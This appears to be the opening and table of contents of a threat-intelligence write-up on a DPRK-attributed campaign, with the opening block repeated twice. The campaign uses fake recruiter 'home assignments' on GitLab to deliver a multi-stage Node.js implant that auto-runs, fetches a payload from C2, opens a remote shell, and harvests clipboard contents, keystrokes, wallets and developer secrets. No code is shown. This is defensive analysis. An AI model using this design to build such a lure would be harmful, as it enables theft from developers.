Beyond eval(): DPRK’s New Malware Strategy Hidden in Job Assignments
Contents
Beyond eval(): DPRK’s New Malware Strategy Hidden in Job Assignments
Targeted recruiter lure delivers a multi-stage Node.js implant with clipboard, keylogging, and recursive secret harvesting.
Threat Actor Profiles
Malware Analysis
Summary: A targeted social-engineering campaign uses a fake recruiter and a public GitLab “home assignment” to deliver a multi-stage Node.js implant. The repo auto-runs a loader that fetches a cross-OS JavaScript payload from C2. The payload provides an interactive socket.io C2 shell, host fingerprinting, clipboard exfiltration, runtime dependency installation, and a second-stage harvester/keylogger that recursively steals wallet files and developer secrets. The campaign is contagious — anyone who clones & runs the assignment is at risk.
Table of contents
High Level Overview
Social engineering & delivery timeline
Repository hosting
Technical timeline & high-level flow
Stage 1 — Beacon, C2, interactive shell & clipboard
Stage 2 — Harvester, keylogger & exfil
C2 pivot in commit history (.cloud → .com)
Capability matrix & MITRE ATT&CK mapping
…
Targeted recruiter lure delivers a multi-stage Node.js implant with clipboard, keylogging, and recursive secret harvesting.
Threat Actor Profiles
Malware Analysis
Summary: A targeted social-engineering campaign uses a fake recruiter and a public GitLab “home assignment” to deliver a multi-stage Node.js implant. The repo auto-runs a loader that fetches a cross-OS JavaScript payload from C2. The payload provides an interactive socket.io C2 shell, host fingerprinting, clipboard exfiltration, runtime dependency installation, and a second-stage harvester/keylogger that recursively steals wallet files and developer secrets. The campaign is contagious — anyone who clones & runs the assignment is at risk.
Table of contents
High Level Overview
Social engineering & delivery timeline
Repository hosting
Technical timeline & high-level flow
Stage 1 — Beacon, C2, interactive shell & clipboard
Stage 2 — Harvester, keylogger & exfil
C2 pivot in commit history (.cloud → .com)
Capability matrix & MITRE ATT&CK mapping
…